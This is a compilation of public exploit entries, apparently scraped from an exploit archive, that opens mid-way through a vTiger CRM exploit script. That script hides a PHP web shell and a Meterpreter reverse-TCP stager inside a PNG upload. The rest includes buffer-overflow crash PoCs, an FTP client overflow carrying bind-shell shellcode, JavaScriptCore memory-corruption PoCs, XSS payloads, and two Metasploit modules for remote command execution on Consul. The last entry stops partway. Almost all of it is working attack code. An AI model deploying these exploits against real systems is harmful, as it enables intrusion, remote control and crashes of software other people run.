Basic_data = "-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"__vtrftk\"\r\n\r\n"+csrf_to_data+"\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"module\"\r\n\r\nVtiger\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"parent\"\r\n\r\nSettings\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nCompanyDetailsSave\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"logo\"; filename=\""+filename+"\"\r\nContent-Type: image/png\r\n\r\n\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00 \x00\x00\x00 \x08\x02\x00\x00\x00\xfc\x18\xed\xa3\x00\x00\x00\tpHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x00`IDATH\x89c\\<?if(isset($_REQUEST['cmd'])){ echo \"<pre>\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"</pre>\"; die; }?>X\x80\x81\x81\xc1s^7\x93\xfc\x8f\x8b\xdb~_\xd3}\xaa'\xf7\xf1\xe3\xc9\xbf_\xef\x06|\xb200c\xd9\xb9g\xfd\xd9=\x1b\xce2\x8c\x82Q0\nF\xc1(\x18\x05\xa3`\x14\x8c\x82Q0\n\x86\r\x00\x00\x81\xb2\x1b\x02\x07x\r\x0c\x00\x00\x00\x00IEND\xaeB`\x82\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"organizationname\"\r\n\r\nvtiger\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n95, 12th Main Road, 3rd Block, Rajajinagar\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"city\"\r\n\r\nBangalore\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"state\"\r\n\r\nKarnataka\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"code\"\r\n\r\n560010\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"country\"\r\n\r\nIndia\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"phone\"\r\n\r\n+91 9243602352\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"fax\"\r\n\r\n+91 9243602352\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"website\"\r\n\r\nwww.vtiger.com\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"vatid\"\r\n\r\n\r\n-----------------------------"+boundary+"--\r\n"

print (Fore.BLUE + "+ [*] Select shell type:")
print (Fore.YELLOW +"- [*] 1 - Basic Shell")
print ("- [*] 2 - Meterpreter Shell")
choose = int(raw_input("- [*] Enter a number (1 or 2) : "))

if choose == 1:
    Basic = requests.post("http://"+rhost+"/index.php", headers=post_headers, cookies=post_cookie, data=Basic_data)
    if Basic.status_code == 200:
       print (Fore.GREEN + "+ [*] Shell successfully uploaded!")
       print (Fore.GREEN + "+ [*] Shell Directory = http://"+rhost+"/test/logo/"+filename+"?cmd=[Command Here]")
    while True:
          shellctrl = requests.get("http://"+rhost+"/test/logo/"+filename+"")
          if shellctrl.status_code == 200:
             Command = str(raw_input(Fore.WHITE + "shell> "))
             URL = requests.get("http://"+rhost+"/test/logo/"+filename+"?cmd="+Command+"")
             print URL.text
          else:
             print (Fore.RED + "+ [X] Unable to upload or access the shell")
             sys.exit()  

elif choose == 2:
    print("+ [*] In this option, you must listen to LHOST and LPORT with your Metasploit.")
    print(Fore.RED + "+ [*] You should use the "+Fore.WHITE +"php/meterpreter/reverse_tcp"+Fore.RED +" payload")
    print(Fore.YELLOW + "+ [*] Enter metasploit handler settings.")

    lhost = str(raw_input(Fore.WHITE + "LHOST : "))
    lport = str(raw_input(Fore.WHITE + "LPORT : "))
   
    Meter_data = "-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"__vtrftk\"\r\n\r\n"+csrf_to_data+"\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"module\"\r\n\r\nVtiger\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"parent\"\r\n\r\nSettings\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nCompanyDetailsSave\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"logo\"; filename=\""+filename+"\"\r\nContent-Type: image/png\r\n\r\n\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00 \x00\x00\x00 \x08\x02\x00\x00\x00\xfc\x18\xed\xa3\x00\x00\x00\tpHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x00`IDATH\x89c\\<?=error_reporting(0); $ip = '"+lhost+"'; $port = "+lport+"; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f(\"tcp://{$ip}:{$port}\"); $s_type = 'stream'; } elseif (($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } elseif (($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } else { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(\"Nlen\", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); die();?>X\x80\x81\x81\xc1s^7\x93\xfc\x8f\x8b\xdb~_\xd3}\xaa'\xf7\xf1\xe3\xc9\xbf_\xef\x06|\xb200c\xd9\xb9g\xfd\xd9=\x1b\xce2\x8c\x82Q0\nF\xc1(\x18\x05\xa3`\x14\x8c\x82Q0\n\x86\r\x00\x00\x81\xb2\x1b\x02\x07x\r\x0c\x00\x00\x00\x00IEND\xaeB`\x82\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"organizationname\"\r\n\r\nvtiger\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n95, 12th Main Road, 3rd Block, Rajajinagar\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"city\"\r\n\r\nBangalore\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"state\"\r\n\r\nKarnataka\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"code\"\r\n\r\n560010\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"country\"\r\n\r\nIndia\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"phone\"\r\n\r\n+91 9243602352\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"fax\"\r\n\r\n+91 9243602352\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"website\"\r\n\r\nwww.vtiger.com\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"vatid\"\r\n\r\n\r\n-----------------------------"+boundary+"--\r\n"
   
    Basic = requests.post("http://"+rhost+"/index.php", headers=post_headers, cookies=post_cookie, data=Meter_data)
    while True:
          payload = requests.get("http://"+rhost+"/test/logo/"+filename+"")
          print("+ [*] Check your Metasploit Framework console")
          if payload.status_code == 200:    
             print (Fore.GREEN + "+ [*] Payload uploaded and executed!")
           
          else:
             print (Fore.RED + "+ [X] Unable to upload and run the payload")
          sys.exit()
else:
    print("Invalid input!")
# end


vtiger0.png
HireHackking 
# Exploit Title:ShareAlarmPro 2.1.4 - Denial of Service (PoC)
# Date: 2018-12-25
# Exploit Author: T3jv1l
# Vendor Homepage: :http://www.nsauditor.com
# Software: http://sharealarm.nsauditor.com/downloads/sharealarmpro_setup.exe
# Contact: https://twitter.com/T3jv1l
# Version:ShareAlarmPro 2.1.4
# Tested on: Windows 7 SP1 x86

# PoC:
# 1.  Download and install the setup file
# 2.  A file "PoC.txt" will be created
# 3.  Click Help > Register... in tool bar
# 4.  Copy the contents of the file (PoV.txt) and paste in the Registration Key/Name field 
# 5.  Click OK and BOOMMMM !!!! 

#!/usr/bin/python

buffer = "\x41" * 5000

payload = buffer
try:
    f=open("PoC.txt","w")
    print "[+] Creating %s bytes payload..." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
HireHackking 
# Exploit Title: NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC)
# Author: Luis Martinez
# Date: 2018-12-27
# Vendor Homepage: www.nsauditor.com
# Software Link : http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
# Tested Version: 1.6.5.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash: 
# 1.- Run python code : python NBMonitor_1.6.5.0.py
# 2.- Open NBMonitor_1.6.5.0.txt and copy content to clipboard
# 3.- Open NBMonitor
# 4.- Register -> Enter Registration Code
# 5.- Paste ClipBoard on "Name:"
# 6.- Key: -> 1
# 7.- OK
# 8.- Crashed

#!/usr/bin/env python
 
buffer = "\x41" * 276
f = open ("NBMonitor_1.6.5.0.txt", "w")
f.write(buffer)
f.close()
HireHackking 
# Exploit Title: NetShareWatcher 1.5.8 - Denial of Service (PoC)
# Date: 2018-12-25
# Exploit Author: T3jv1l
# Vendor Homepage: :http://www.nsauditor.com
# Software: http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
# Contact: https://twitter.com/T3jv1l
# Version: NetShareWatcher 1.5.8
# Tested on: Windows 7 SP1 x86
# Other software from the vendor affected 
# Software: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe

# PoC:
# 1.  Download and install the setup file
# 2.  A file "PoC.txt" will be created
# 3.  Click Help > Register... in tool bar
# 4.  Copy the contents of the file (PoV.txt) and paste in the Registration Key/Name field 
# 5.  Click OK and BOOMMMM !!!! 

#!/usr/bin/python

buffer = "\x41" * 5256

payload = buffer
try:
    f=open("PoC.txt","w")
    print "[+] Creating %s bytes payload..." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
HireHackking 
# Exploit Title: EZ CD Audio Converter 8.0.7 - Denial of Service (PoC)
# Date: 2018-12-30
# Exploit Author: Achilles
# Vendor Homepage: https://www.poikosoft.com/
# Software Link : https://download.poikosoft.com/ez_cd_audio_converter_setup_x64.exe
# Exploit Author: Achilles
# Tested Version: 8.0.7 (64-bit)
# Tested on: Windows 7 x64
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
# Steps to Produce the Crash:=20
# 1.- Run python code : EZ_CD_Audio_Converter.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open EZ_CD_Audio_Converter 'Press Activate'
# 4.- Paste the content of EVIL.txt into the field: 'Key'
# 5.- And you will see a crash.

#!/usr/bin/env python

buffer = "\x41" * 10000

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"
HireHackking 
# Exploit Title: Frog CMS 0.9.5 - Cross-Site Scripting
# Date: 2018-12-25
# Exploit Author:WangDudu
# Vendor Homepage: https://github.com/philippe/FrogCMS
# Software Link: https://github.com/philippe/FrogCMS
# Version:0.9.5
# CVE :CVE-2018-20448

# The parameter under /install/index.php is that the Database name has reflective XSS
# 1 The Database name , username and password must be correct
# 2 You can use the exp: 

<script>alert(1)</script>
HireHackking 
<!--
void AbstractValue::set(Graph& graph, RegisteredStructure structure)
{
    RELEASE_ASSERT(structure);
    
    m_structure = structure;

    m_arrayModes = asArrayModes(structure->indexingType());
    m_type = speculationFromStructure(structure.get());
    m_value = JSValue();
    
    checkConsistency();
    assertIsRegistered(graph);
}

It works out m_arrayModes using structure->indexingType() instead of structure->indexingMode(). As structure->indexingType() masks out the CopyOnWrite flag, which indicates that the butterfly of the array is immutable, needing copy-on-write, the wrong information about the array can be propagated. As a result, it's able to write into the immutable butterfly (JSImmutableButterfly) of a CoW array. And this can lead to UaF as 
writing into an immutable butterfly can be used to bypass write barriers.

I also noticed that the most calls to asArrayModes are using structure->indexingType(). I think that those should be fixed too.

PoC:
-->

// ./jsc --useConcurrentJIT=false ~/test.js

function set(arr, value) {
    arr[0] = value;
}

function getImmutableArrayOrSet(get, value) {
    let arr = [1];
    if (get)
        return arr;

    set(arr, value);  // This inlinee is for having checkArray not take the paths using the structure comparison.
    set({}, 1);
}

function main() {
    getImmutableArrayOrSet(true);

    for (let i = 0; i < 100; i++) {
        getImmutableArrayOrSet(false, {});
    }

    let arr = getImmutableArrayOrSet(true);
    print(arr[0] === 1);
}

main();

PoC 2 (UaF):
<script>

function sleep(ms) {
    let s = new Date();
    while (new Date() - s < ms) {

    }
}

function mark() {
    for (let i = 0; i < 40; i++) {
        new ArrayBuffer(1024 * 1024 * 1);
    }
}

function set(arr, value) {
    arr[0] = value;
}

function getImmutableArrayOrSet(get, value) {
    let arr = [1];
    if (get)
        return arr;

    set(arr, value);
    set({}, 1);
}

function main() {
    getImmutableArrayOrSet(true);

    for (let i = 0; i < 10000; i++)
        getImmutableArrayOrSet(false, {});

    sleep(500);

    let arr = getImmutableArrayOrSet(true);

    mark();
    getImmutableArrayOrSet(false, []);
    mark();

    setTimeout(() => {
        try {
            alert(arr[0]);
        } catch (e) {
            alert(e);
        }
    }, 200);
}

main();

</script>
HireHackking 
# Exploit Title: Ayukov NFTP FTP Client 2.0 - Buffer Overflow
# Date: 2018-12-29
# Exploit Author: Uday Mittal
# Vendor Homepage: http://www.ayukov.com/nftp/
# Software Link: ftp://ftp.ayukov.com/pub/src/nftp-1.72.zip 
# Version : below 2.0
# Tested on: Microsoft Windows XP SP3
# CVE: CVE-2017-15222

# EIP Location: 4116
# Buffer starts from : 4121
# 0x7e45b310 : jmp esp |  {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
# badchars: '\x00\x0A\x0D\x40'
# Shellcode: msfvenom -p windows/shell_bind_tcp RHOST=192.168.43.72 LPORT=4444 -b '\x00\x0A\x0D' -f python

import socket

IP = '192.168.43.28'
port = 21

buf =  ""
buf += "\xbb\x04\x8b\xfc\xf1\xd9\xc4\xd9\x74\x24\xf4\x5a\x29"
buf += "\xc9\xb1\x53\x83\xea\xfc\x31\x5a\x0e\x03\x5e\x85\x1e"
buf += "\x04\xa2\x71\x5c\xe7\x5a\x82\x01\x61\xbf\xb3\x01\x15"
buf += "\xb4\xe4\xb1\x5d\x98\x08\x39\x33\x08\x9a\x4f\x9c\x3f"
buf += "\x2b\xe5\xfa\x0e\xac\x56\x3e\x11\x2e\xa5\x13\xf1\x0f"
buf += "\x66\x66\xf0\x48\x9b\x8b\xa0\x01\xd7\x3e\x54\x25\xad"
buf += "\x82\xdf\x75\x23\x83\x3c\xcd\x42\xa2\x93\x45\x1d\x64"
buf += "\x12\x89\x15\x2d\x0c\xce\x10\xe7\xa7\x24\xee\xf6\x61"
buf += "\x75\x0f\x54\x4c\xb9\xe2\xa4\x89\x7e\x1d\xd3\xe3\x7c"
buf += "\xa0\xe4\x30\xfe\x7e\x60\xa2\x58\xf4\xd2\x0e\x58\xd9"
buf += "\x85\xc5\x56\x96\xc2\x81\x7a\x29\x06\xba\x87\xa2\xa9"
buf += "\x6c\x0e\xf0\x8d\xa8\x4a\xa2\xac\xe9\x36\x05\xd0\xe9"
buf += "\x98\xfa\x74\x62\x34\xee\x04\x29\x51\xc3\x24\xd1\xa1"
buf += "\x4b\x3e\xa2\x93\xd4\x94\x2c\x98\x9d\x32\xab\xdf\xb7"
buf += "\x83\x23\x1e\x38\xf4\x6a\xe5\x6c\xa4\x04\xcc\x0c\x2f"
buf += "\xd4\xf1\xd8\xda\xdc\x54\xb3\xf8\x21\x26\x63\xbd\x89"
buf += "\xcf\x69\x32\xf6\xf0\x91\x98\x9f\x99\x6f\x23\x8e\x05"
buf += "\xf9\xc5\xda\xa5\xaf\x5e\x72\x04\x94\x56\xe5\x77\xfe"
buf += "\xce\x81\x30\xe8\xc9\xae\xc0\x3e\x7e\x38\x4b\x2d\xba"
buf += "\x59\x4c\x78\xea\x0e\xdb\xf6\x7b\x7d\x7d\x06\x56\x15"
buf += "\x1e\x95\x3d\xe5\x69\x86\xe9\xb2\x3e\x78\xe0\x56\xd3"
buf += "\x23\x5a\x44\x2e\xb5\xa5\xcc\xf5\x06\x2b\xcd\x78\x32"
buf += "\x0f\xdd\x44\xbb\x0b\x89\x18\xea\xc5\x67\xdf\x44\xa4"
buf += "\xd1\x89\x3b\x6e\xb5\x4c\x70\xb1\xc3\x50\x5d\x47\x2b"
buf += "\xe0\x08\x1e\x54\xcd\xdc\x96\x2d\x33\x7d\x58\xe4\xf7"
buf += "\x8d\x13\xa4\x5e\x06\xfa\x3d\xe3\x4b\xfd\xe8\x20\x72"
buf += "\x7e\x18\xd9\x81\x9e\x69\xdc\xce\x18\x82\xac\x5f\xcd"
buf += "\xa4\x03\x5f\xc4"

evil = "A"*4116 + "\x10\xb3\x45\x7e" + "\x90"*100 +  buf + "D"*10425

try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((IP, port))
        s.listen(20)
        print("[i] FTP Server started on port: "+str(port)+"\r\n")
except:
        print("[!] Failed to bind the server to port: "+str(port)+"\r\n")

while True:
    conn, addr = s.accept()
    conn.send('220 Welcome!' + '\r\n')
    print conn.recv(1024)
    conn.send('331 OK.\r\n')
    print conn.recv(1024)
    conn.send('230 OK.\r\n')
    print conn.recv(1024)
    conn.send(evil + '\r\n')
    print conn.recv(1024)
    conn.send('257' + '\r\n')
HireHackking 
# Exploit Title: NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-12-27
# Vendor Homepage: www.nsauditor.com
# Software Link : http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Tested Version: 3.0.0.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash: 
# 1.- Run python code : python NetworkSleuth_3.0.0.0.py
# 2.- Open NetworkSleuth_3.0.0.0.txt and copy content to clipboard
# 3.- Open NetworkSleuth
# 4.- Register -> Enter Registration Code...
# 5.- Name: -> l4m5
# 6.- Paste ClipBoard on "Key:"
# 7.- OK
# 8.- Crashed

#!/usr/bin/env python
 
buffer = "\x41" * 276
f = open ("NetworkSleuth_3.0.0.0.txt", "w")
f.write(buffer)
f.close()
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Hashicorp Consul Remote Command Execution via Services API",
      'Description'    => %q{
        This module exploits Hashicorp Consul's services API to gain remote command
        execution on Consul nodes.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Bharadwaj Machiraju <bharadwaj.machiraju[at]gmail.com>', # Discovery and PoC
          'Francis Alexander <helofrancis[at]gmail.com >', # Discovery and PoC
          'Quentin Kaiser <kaiserquentin[at]gmail.com>' # Metasploit module
        ],
      'References'     =>
        [
          [ 'URL', 'https://www.consul.io/api/agent/service.html' ],
          [ 'URL', 'https://github.com/torque59/Garfield' ]
        ],
      'Platform'        => 'linux',
      'Targets'         => [ [ 'Linux', {} ] ],
      'Payload'         => {},
      'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf', 'curl', 'wget'],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 11 2018'))
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path', '/']),
        OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]),
        OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']),
        Opt::RPORT(8500)
      ])
  end

  def check
    res = send_request_cgi({
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path, '/v1/agent/self'),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      }
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.code == 200
      vprint_error 'Unexpected reply'
      return CheckCode::Safe
    end

    agent_info = JSON.parse(res.body)

    if agent_info["Config"]["EnableScriptChecks"] == true || agent_info["DebugConfig"]["EnableScriptChecks"] == true || agent_info["DebugConfig"]["EnableRemoteScriptChecks"] == true
      return CheckCode::Vulnerable
    end

    CheckCode::Safe
  rescue JSON::ParserError
    vprint_error 'Failed to parse JSON output.'
    return CheckCode::Unknown
  end

  def execute_command(cmd, opts = {})
    uri = target_uri.path
    service_name = Rex::Text.rand_text_alpha(5..10)
    print_status("Creating service '#{service_name}'")

    # NOTE: Timeout defines how much time the check script will run until
    # getting killed. Arbitrarily set to one day for now.
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, 'v1/agent/service/register'),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      },
      'ctype' => 'application/json',
      'data' => {
        :ID => "#{service_name}",
        :Name => "#{service_name}",
        :Address => "127.0.0.1",
        :Port => 80,
        :check => {
          :script => "#{cmd}",
          :Args => ["sh", "-c", "#{cmd}"],
          :interval => "10s",
          :Timeout => "86400s"
        }
      }.to_json
    })
    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, 'An error occured when contacting the Consul API.')
    end
    print_status("Service '#{service_name}' successfully created.")
    print_status("Waiting for service '#{service_name}' script to trigger")
    sleep(12)
    print_status("Removing service '#{service_name}'")
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(
        uri,
        "v1/agent/service/deregister/#{service_name}"
      ),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      }
    })
    if res && res.code != 200
      fail_with(Failure::UnexpectedReply,
        'An error occured when contacting the Consul API.'
      )
    end
  end

  def exploit
    execute_cmdstager()
  end
end
HireHackking 
/*
bool JSArray::shiftCountWithArrayStorage(VM& vm, unsigned startIndex, unsigned count, ArrayStorage* storage)
{
    unsigned oldLength = storage->length();
    RELEASE_ASSERT(count <= oldLength);
    
    // If the array contains holes or is otherwise in an abnormal state,
    // use the generic algorithm in ArrayPrototype.
    if ((storage->hasHoles() && this->structure(vm)->holesMustForwardToPrototype(vm, this)) 
        || hasSparseMap() 
        || shouldUseSlowPut(indexingType())) {
        return false;
    }

    if (!oldLength)
        return true;
    
    unsigned length = oldLength - count;
    
    storage->m_numValuesInVector -= count;
    storage->setLength(length);


Considering the comment, I think the method is supposed to prevent an array with holes from going through to the code "storage->m_numValuesInVector -= count". But that kind of arrays actually can get there by only having the holesMustForwardToPrototype method return false. Unless the array has any indexed accessors on it or Proxy objects in the prototype chain, the method will just return false. So "storage->m_numValuesInVector" can be controlled by the user.

In the PoC, it changes m_numValuesInVector to 0xfffffff0 that equals to the new length, making the hasHoles method return false, leading to OOB reads/writes in the JSArray::unshiftCountWithArrayStorage method.

PoC:
*/

function main() {
    let arr = [1];

    arr.length = 0x100000;
    arr.splice(0, 0x11);

    arr.length = 0xfffffff0;
    arr.splice(0xfffffff0, 0, 1);
}

main();
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Hashicorp Consul Remote Command Execution via Rexec",
      'Description'    => %q{
        This module exploits a feature of Hashicorp Consul named rexec.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Bharadwaj Machiraju <bharadwaj.machiraju[at]gmail.com>', # Discovery and PoC
          'Francis Alexander <helofrancis[at]gmail.com>', # Discovery and PoC
          'Quentin Kaiser <kaiserquentin[at]gmail.com>' # Metasploit module
        ],
      'References'     =>
        [
          [ 'URL', 'https://www.consul.io/docs/agent/options.html#disable_remote_exec' ],
          [ 'URL', 'https://www.consul.io/docs/commands/exec.html'],
          [ 'URL', 'https://github.com/torque59/Garfield' ]
        ],
      'Platform'        => 'linux',
      'Targets'         => [ [ 'Linux', {} ] ],
      'Payload'         => {},
      'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf', 'wget', 'curl' ],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 11 2018'))
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path', '/']),
        OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]),
        OptInt.new('TIMEOUT', [false, 'The timeout to use when waiting for the command to trigger', 20]),
        OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']),
        Opt::RPORT(8500)
      ])
  end

  def check
    uri = target_uri.path
    res = send_request_cgi({
      'method'  => 'GET',
      'uri' => normalize_uri(uri, "/v1/agent/self"),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      }
    })
    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end
    begin
      agent_info = JSON.parse(res.body)
      if agent_info["Config"]["DisableRemoteExec"] == false || agent_info["DebugConfig"]["DisableRemoteExec"] == false
        return CheckCode::Vulnerable
      else
        return CheckCode::Safe
      end
    rescue JSON::ParserError
      vprint_error 'Failed to parse JSON output.'
      return CheckCode::Unknown
    end
  end

  def execute_command(cmd, opts = {})
    uri = target_uri.path

    print_status('Creating session.')
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, 'v1/session/create'),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      },
      'ctype' => 'application/json',
      'data' => {:Behavior => "delete", :Name => "Remote Exec", :TTL => "15s"}.to_json
    })

    if res and res.code == 200
      begin
        sess = JSON.parse(res.body)
        print_status("Got rexec session ID #{sess['ID']}")
      rescue JSON::ParseError
        fail_with(Failure::Unknown, 'Failed to parse JSON output.')
      end
    end

    print_status("Setting command for rexec session #{sess['ID']}")
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/job?acquire=#{sess['ID']}"),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      },
      'ctype' => 'application/json',
      'data' => {:Command => "#{cmd}", :Wait => 2000000000}.to_json
    })
    if res and not res.code == 200 or res.body == 'false'
      fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
    end

    print_status("Triggering execution on rexec session #{sess['ID']}")
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, "v1/event/fire/_rexec"),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      },
      'ctype' => 'application/json',
      'data' => {:Prefix => "_rexec", :Session => "#{sess['ID']}"}.to_json
    })
    if res and not res.code == 200
      fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
    end

    begin
      Timeout.timeout(datastore['TIMEOUT']) do
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/?keys=&wait=2000ms"),
          'headers' => {
            'X-Consul-Token' => datastore['ACL_TOKEN']
          }
        })
        begin
          data = JSON.parse(res.body)
          break if data.include? 'out'
        rescue JSON::ParseError
          fail_with(Failure::Unknown, 'Failed to parse JSON output.')
        end
        sleep 2
      end
    rescue Timeout::Error
      # we catch this error so cleanup still happen afterwards
      print_status("Timeout hit, error with payload ?")
    end

    print_status("Cleaning up rexec session #{sess['ID']}")
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, "v1/session/destroy/#{sess['ID']}"),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      }
    })

    if res and not res.code == 200 or res.body == 'false'
      fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
    end

    res = send_request_cgi({
      'method' => 'DELETE',
      'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}?recurse="),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      }
    })

    if res and not res.code == 200 or res.body == 'false'
      fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
    end
  end

  def exploit
    execute_cmdstager()
  end
end
HireHackking 
# Exploit Title: Embed Video Scripts - Cross-site Script (stored)
# Google Dork: N/A
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# POC Video: https://youtu.be/2CFJLwkxpT8
# Vendor Homepage: https://codeawesome.in/embed/
# Software Link: https://codecanyon.net/item/embed-video-scripts/20831073
# Demo Website: https://codeawesome.in/embed/
# Version: N/A
# Tested on: WIN7_x68/Linux
# CVE : N/A

# Description:
A stored xss found in "Embed Video Scripts" comments section.

# POC Request:

:method: POST
:authority: server
:scheme: https
:path: /embed/comments
content-length: 145
accept: */*
origin: https://server
x-requested-with: XMLHttpRequest
user-agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
content-type: application/x-www-form-urlencoded; charset=UTF-8
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
